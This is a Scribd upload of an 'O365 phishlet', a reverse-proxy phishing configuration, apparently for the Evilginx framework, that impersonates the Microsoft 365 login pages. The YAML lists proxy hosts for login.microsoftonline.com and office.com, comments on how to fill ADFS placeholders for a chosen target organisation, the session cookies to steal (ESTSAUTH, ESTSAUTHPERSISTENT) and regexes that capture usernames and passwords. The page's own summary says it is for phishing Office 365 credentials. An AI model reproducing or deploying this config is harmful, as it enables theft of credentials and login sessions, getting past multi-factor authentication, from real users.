Scribd Logo
Upload

Welcome to Scribd!

  • O365 Phishlet

    Uploaded by

    Tilde Alp
    216 views1 page
    This document defines configuration settings for phishing Office 365 credentials. It specifies proxy hosts, subdomains to filter, authentication tokens to capture, and login details. Comments indicate additional configuration may be needed for organizations using ADFS authentication. Key details like subdomains and ADFS settings would need to be customized based on the target organization.

    Original Description:

    Phishy Phishlet

    Original Title

    O365.phishlet

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document defines configuration settings for phishing Office 365 credentials. It specifies proxy hosts, subdomains to filter, authentication tokens to capture, and login details. Comments indicate additional configuration may be needed for organizations using ADFS authentication. Key details like subdomains and ADFS settings would need to be customized based on the target organization.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    216 views1 page

    O365 Phishlet

    Uploaded by

    Tilde Alp
    This document defines configuration settings for phishing Office 365 credentials. It specifies proxy hosts, subdomains to filter, authentication tokens to capture, and login details. Comments indicate additional configuration may be needed for organizations using ADFS authentication. Key details like subdomains and ADFS settings would need to be customized based on the target organization.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 1

    name: 'o365'

    author: '@jamescullum'
    min_ver: '2.3.0'
    proxy_hosts:
    - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session:
    true, is_landing: true}
    - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false,
    is_landing:false}
    # The lines below are needed if your target organization utilizes ADFS.
    # If they do, you need to uncomment all following lines that contain <...>
    # To get the correct ADFS subdomain, test the web login manually and check where
    you are redirected.
    # Assuming you get redirected to adfs.example.com, the placeholders need to be
    filled out as followed:
    # <insert-adfs-subdomain> = adfs
    # <insert-adfs-host> = example.com
    # <insert-adfs-subdomain-and-host> = adfs.example.com
    - {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-
    host>', session: true, is_landing:false}
    - {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-
    host>:443', session: true, is_landing:false}
    sub_filters:
    - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain:
    'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://
    {hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain:
    'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}',
    mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only:
    true}
    # Uncomment and fill in if your target organization utilizes ADFS
    - {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain:
    'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}',
    mimes: ['text/html', 'application/json', 'application/javascript']}
    auth_tokens:
    - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
    - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie']
    credentials:
    username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
    password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
    login:
    domain: 'login.microsoftonline.com'
    path: '/'

    You might also like